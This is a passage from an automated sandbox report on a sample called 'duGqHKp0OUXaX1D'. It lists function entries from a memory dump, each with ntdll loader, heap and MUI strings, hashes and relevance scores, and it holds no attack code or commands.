                                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 01A682DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-1783798831
                                                                                                                    • Opcode ID: afc21dbc3f53f51e479bafed5276a89d3d7b474089a4bccedcca7f2df3e51b27
                                                                                                                    • Instruction ID: 96b56ab6a53ad633fdc44e84e14bcecb287e76d99fa2d4dd46dafe4f3cb37fa8
                                                                                                                    • Opcode Fuzzy Hash: afc21dbc3f53f51e479bafed5276a89d3d7b474089a4bccedcca7f2df3e51b27
                                                                                                                    • Instruction Fuzzy Hash: 7E4121B5550311ABCB31EB78DD44B5B77E8AF98B60F00492AF948DB294E774D801CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AAC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01AAC1C5
                                                                                                                    • @, xrefs: 01AAC1F1
                                                                                                                    • PreferredUILanguages, xrefs: 01AAC212
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                    • API String ID: 0-2968386058
                                                                                                                    • Opcode ID: 241ec696355ab77e6df9b316d1c7128e1929da2a4babaf706d92416e73337a9c
                                                                                                                    • Instruction ID: 474726d50e6d0171dee31dbbda0b28d5c1cc84f22c9a845c2f5a4de65beb5fb3
                                                                                                                    • Opcode Fuzzy Hash: 241ec696355ab77e6df9b316d1c7128e1929da2a4babaf706d92416e73337a9c
                                                                                                                    • Instruction Fuzzy Hash: AF417471E00209EBEF11EFD8C851FEEBBB8AB54710F54406AE609F7244D7749A48CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A84144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                    • API String ID: 0-1373925480
                                                                                                                    • Opcode ID: ef85d780fe457d0d342314e3055545ba16412cc1ede7a7ae0fb2082c60456f25
                                                                                                                    • Instruction ID: 8f93db93c8a751e60ab57a300951d88369cdd6a00eba21aaaa283c2ac530303f
                                                                                                                    • Opcode Fuzzy Hash: ef85d780fe457d0d342314e3055545ba16412cc1ede7a7ae0fb2082c60456f25
                                                                                                                    • Instruction Fuzzy Hash: E641F771A0475ACFEB26EBE9C944BADBBB4FF69340F14045AD901EB791E7348901CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A74755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • LdrpCheckRedirection, xrefs: 01A7488F
                                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A74888
                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01A74899
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                    • API String ID: 0-3154609507
                                                                                                                    • Opcode ID: fc8a73f385cb4dd96cf262de7384c631e53491b0b2b91ef9691f39da01b9ee23
                                                                                                                    • Instruction ID: 0f9419995fd23377b4acd98edee126d7bcb17c7968b487a2339454b8c6e7aad8
                                                                                                                    • Opcode Fuzzy Hash: fc8a73f385cb4dd96cf262de7384c631e53491b0b2b91ef9691f39da01b9ee23
                                                                                                                    • Instruction Fuzzy Hash: B141AF76A047559BCB22CF6CDD40A26BBE4AF8DA50F09056DED999B211D730DA00CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A00BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                    • API String ID: 0-2558761708
                                                                                                                    • Opcode ID: 2afefcef955ba975463395d31f0fda351922ec23e068ce75c3364416d5d2d085
                                                                                                                    • Instruction ID: 6cbbc4df66813ebaeb178ac9e154dcbc71f3af67fc64ba1baa77d6deafba95e2
                                                                                                                    • Opcode Fuzzy Hash: 2afefcef955ba975463395d31f0fda351922ec23e068ce75c3364416d5d2d085
                                                                                                                    • Instruction Fuzzy Hash: 801102317185429FDB5ACB28E544B36B7F6EF81B19F188019F80ACF292D730E841C751
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • LdrpInitializationFailure, xrefs: 01A720FA
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A72104
                                                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 01A720F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-2986994758
                                                                                                                    • Opcode ID: ab7994d6de75f4c5bed9be1f109ceed72f486ef201c66229714d31375cac7f3e
                                                                                                                    • Instruction ID: 125ebef77c08eac8be9f887f3a13b136228812a53fc13dc991707f697358b151
                                                                                                                    • Opcode Fuzzy Hash: ab7994d6de75f4c5bed9be1f109ceed72f486ef201c66229714d31375cac7f3e
                                                                                                                    • Instruction Fuzzy Hash: 03F0C8796803086BE724DB4DED57F9977A8FB85B54F100069F6446B281D1B0A601C751
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: #%u
                                                                                                                    • API String ID: 48624451-232158463
                                                                                                                    • Opcode ID: 06fa7a2c8cd02da2fa728ad092324e977c9803aed047207b071948e3aff254c2
                                                                                                                    • Instruction ID: 5d36c2a8c9a0428302a006d01dc880872a7606beafd2dda2eec3421c584c0a65
                                                                                                                    • Opcode Fuzzy Hash: 06fa7a2c8cd02da2fa728ad092324e977c9803aed047207b071948e3aff254c2
                                                                                                                    • Instruction Fuzzy Hash: 82717D71A0014A9FDB02DFA8DA80BAEB7F8FF58344F154065E905E7291EB34EE45CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019FA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • LdrResSearchResource Enter, xrefs: 019FAA13
                                                                                                                    • LdrResSearchResource Exit, xrefs: 019FAA25
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                    • API String ID: 0-4066393604
                                                                                                                    • Opcode ID: ed036564d592b8012d002e6125df85c76f318682522d29eb011eda4894f3656d
                                                                                                                    • Instruction ID: 48e4e74d14ecc682cbedb482cd7f6b4df5f3132094a975523581bf681a797391
                                                                                                                    • Opcode Fuzzy Hash: ed036564d592b8012d002e6125df85c76f318682522d29eb011eda4894f3656d
                                                                                                                    • Instruction Fuzzy Hash: 5AE17E71E04209AFEF22CF99D980BAEBBBABF54350F14442AEE09E7251D774D944CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01ABA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `$`
                                                                                                                    • API String ID: 0-197956300
                                                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                    • Instruction ID: 3b523254579933f7359728894985426ead89cbe3374c1a3c26105288905577fe
                                                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                    • Instruction Fuzzy Hash: B9C1C3712043829BE725CF28C981BABBBE9BFC4314F084A2DF696C7292D779D545CB41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A6E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: Legacy$UEFI
                                                                                                                    • API String ID: 2994545307-634100481
                                                                                                                    • Opcode ID: dfeb16dec0c2a8ca05fe34d054cedccbea22d20853862806a0d576e8cb614700
                                                                                                                    • Instruction ID: 6e11dc9b13511c493ab9b5ba2a11279c96fadd7ccf7e49a8e46e44dd0b8b72ca
                                                                                                                    • Opcode Fuzzy Hash: dfeb16dec0c2a8ca05fe34d054cedccbea22d20853862806a0d576e8cb614700
                                                                                                                    • Instruction Fuzzy Hash: AB614A76E003199FDB25DFA9C940BAEBBF9FB48700F24406DE649EB291D735A900CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A943D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$MUI
                                                                                                                    • API String ID: 0-17815947
                                                                                                                    • Opcode ID: 1f47e611011fb01455256a0ca66f545744c8434e52c4da18e02342f6cfeff731
                                                                                                                    • Instruction ID: ca0ae66f497641eb3416c8e12e1df3a377cf500cb09e74408d19e08a3ebd896b
                                                                                                                    • Opcode Fuzzy Hash: 1f47e611011fb01455256a0ca66f545744c8434e52c4da18e02342f6cfeff731
                                                                                                                    • Instruction Fuzzy Hash: 57510971D0061DAFEF11DFE9CD90BEEBBB8AB48754F10052AE615A7290D6309D46CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019F063D
                                                                                                                    • kLsE, xrefs: 019F0540
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                    • API String ID: 0-2547482624
                                                                                                                    • Opcode ID: b6181877afdb2eacdad4c8e661de4880b741f12f00070d18ffc64310e54d4861
                                                                                                                    • Instruction ID: 368dfaa4b6938c9f4dfcd7e25e6f3b9b0933d843cfe0ba07c2651721e354e268
                                                                                                                    • Opcode Fuzzy Hash: b6181877afdb2eacdad4c8e661de4880b741f12f00070d18ffc64310e54d4861
                                                                                                                    • Instruction Fuzzy Hash: 7A51FF71500742ABC724DF29C5446A3BBEEAF84305F18493EF6DD87242E770E505CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019FA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 019FA2FB
                                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 019FA309
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                    • API String ID: 0-2876891731
                                                                                                                    • Opcode ID: 7aa60a060c7b24670e1ec938578dddb0396a53e9a52f1d9fdd7c6d5cebe3e28f
                                                                                                                    • Instruction ID: 806fc62222a17bf03f577f39b098f10e504d8c5026aa1b07acd3d30c7afcce16
                                                                                                                    • Opcode Fuzzy Hash: 7aa60a060c7b24670e1ec938578dddb0396a53e9a52f1d9fdd7c6d5cebe3e28f
                                                                                                                    • Instruction Fuzzy Hash: 9D41D034A04645EFEB15DF59C840B6D7BB4FF94710F15446AEE08DB291E7B5DA00CB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                                    • Opcode ID: 02566cad7e53116fd26a6b75c4fddba739c722a28879235aa61353934ba92560
                                                                                                                    • Instruction ID: 5ff1ebbbc9c73e57a0728562fe9d5f9a2e4b187b97e96f2910aa68e4dbcd69e9
                                                                                                                    • Opcode Fuzzy Hash: 02566cad7e53116fd26a6b75c4fddba739c722a28879235aa61353934ba92560
                                                                                                                    • Instruction Fuzzy Hash: BF01D1B2250700AFE321DF18CE45B1677E8E794B15F058979E64CCB590E734E804CB46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019FC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: MUI
                                                                                                                    • API String ID: 0-1339004836
                                                                                                                    • Opcode ID: 63f4f8c0167375ae2d74d496f691a332255a3158bcd7fe2699d5e6684721c5e2
                                                                                                                    • Instruction ID: 88010ad2e1c2c28a31561e137ca5584a41b596091a59056dba33659eb726b8f9
                                                                                                                    • Opcode Fuzzy Hash: 63f4f8c0167375ae2d74d496f691a332255a3158bcd7fe2699d5e6684721c5e2
                                                                                                                    • Instruction Fuzzy Hash: BC825C75E0021DABEB25CFA9C880BEDBBB5FF48711F14816DEA1DAB291D7309941CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A76420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: ffeb0fc8f8dd542bf50ae4d0df91dacf50fafab17ff77a86d9e23a965ac136f3
                                                                                                                    • Instruction ID: c8fff4cf54f2830de324113852fad85fff6fea2d0fba170278fc896e0d482993
                                                                                                                    • Opcode Fuzzy Hash: ffeb0fc8f8dd542bf50ae4d0df91dacf50fafab17ff77a86d9e23a965ac136f3
                                                                                                                    • Instruction Fuzzy Hash: D4917371900619BFEB21DF95CD85FAEBBB8EF18B50F140065F604AB194D774AE04CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A9E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: 1c67f87a1ca234559dbf092d01551fd8793e89ef51ae0b4ab9350247badcd997
                                                                                                                    • Instruction ID: bbd20dec1085a2418717230ff522bf2e122791eef8873c766f82b6d8415a304f
                                                                                                                    • Opcode Fuzzy Hash: 1c67f87a1ca234559dbf092d01551fd8793e89ef51ae0b4ab9350247badcd997
                                                                                                                    • Instruction Fuzzy Hash: B691BF72A01649BFDF22EBA4DD84FAFBBB9EF85740F140029F504A7252DB349941CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: GlobalTags
                                                                                                                    • API String ID: 0-1106856819
                                                                                                                    • Opcode ID: 3a28c67d2b25bc90af99c54d1c6c47a0587bd6c1176810ee83b1dfe45bfff000
                                                                                                                    • Instruction ID: 3c3f400fcf1c503e64e8ed6eb56dce70e6ed2c29172227c2f9a7e3808d873d20
                                                                                                                    • Opcode Fuzzy Hash: 3a28c67d2b25bc90af99c54d1c6c47a0587bd6c1176810ee83b1dfe45bfff000
                                                                                                                    • Instruction Fuzzy Hash: 7671AEB5E0021ADFDF29CFACD5906ADBBB5BF98700F14812EE909A7241E7349941CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A94978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .mui
                                                                                                                    • API String ID: 0-1199573805
                                                                                                                    • Opcode ID: ea1c3b79826364178b508712d2fb4e9a31fec0bebfecbd9ab411b06bffe01c67
                                                                                                                    • Instruction ID: 75f2bba6c0c6cf2c80cee43a918adc3ad7bd309e9d2747c1b8deaa669b2da33d
                                                                                                                    • Opcode Fuzzy Hash: ea1c3b79826364178b508712d2fb4e9a31fec0bebfecbd9ab411b06bffe01c67
                                                                                                                    • Instruction Fuzzy Hash: A5519572D002299BDF11DF99DA40AAEBBF4BF5DB10F054129EA15B7250D7389C42CBE4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A0E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: EXT-
                                                                                                                    • API String ID: 0-1948896318
                                                                                                                    • Opcode ID: c79b829edc3a98f8582cc527a48e6cd7e8faf879d20e6a42f08edf60bac3f391
                                                                                                                    • Instruction ID: 53622ebb838ad9235ea08b18f56b9bf8badfec3d192e3a41cbbc5b92e1420062
                                                                                                                    • Opcode Fuzzy Hash: c79b829edc3a98f8582cc527a48e6cd7e8faf879d20e6a42f08edf60bac3f391
                                                                                                                    • Instruction Fuzzy Hash: 8E4160726083429BD722DB75EA80B6BB7E8AF88714F440D2DFA84D7180E674D9049797
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A6C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: BinaryHash
                                                                                                                    • API String ID: 0-2202222882
                                                                                                                    • Opcode ID: 250bc5d7210bbf63b3b462134af9e89a8bdd54229e9f5bb85c35e54dd58eb7d9
                                                                                                                    • Instruction ID: 382e3ed0df34490d33b9a617ee6f4050c85137bfd3545a2e608d8d347779575d
                                                                                                                    • Opcode Fuzzy Hash: 250bc5d7210bbf63b3b462134af9e89a8bdd54229e9f5bb85c35e54dd58eb7d9
                                                                                                                    • Instruction Fuzzy Hash: EB4175B1D0012DAFDB21DB50DD84FDEB77CAB55724F0045A5EB48AB140DB709E898FA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A86B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #
                                                                                                                    • API String ID: 0-1885708031
                                                                                                                    • Opcode ID: 744ffe47e2b4d5a918145ada92640cb1fd06b8d8a473633664479a09b8ca9b66
                                                                                                                    • Instruction ID: 56b828e54e98e52c98f8e328c6766251ebc5d528d06402a50560eee85917f16f
                                                                                                                    • Opcode Fuzzy Hash: 744ffe47e2b4d5a918145ada92640cb1fd06b8d8a473633664479a09b8ca9b66
                                                                                                                    • Instruction Fuzzy Hash: DE310771E007199BFB22EF69C954BFEBBB8EF45704F144028E949AB282D775D805CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A6CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: BinaryName
                                                                                                                    • API String ID: 0-215506332
                                                                                                                    • Opcode ID: e9015643e412ba19cc88f7ab28f31b9a9f6de53a10bbf8c0c596ee31c735b7b4
                                                                                                                    • Instruction ID: bfbe36446c45231c9a822b02128ed22bb4751cbed42c2480048fb7ea35e12f35
                                                                                                                    • Opcode Fuzzy Hash: e9015643e412ba19cc88f7ab28f31b9a9f6de53a10bbf8c0c596ee31c735b7b4
                                                                                                                    • Instruction Fuzzy Hash: 0031F576900519AFEB16DF59C945E7FBB78EF80730F018129E945A7294D7309E04DBE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A7892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A7895E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
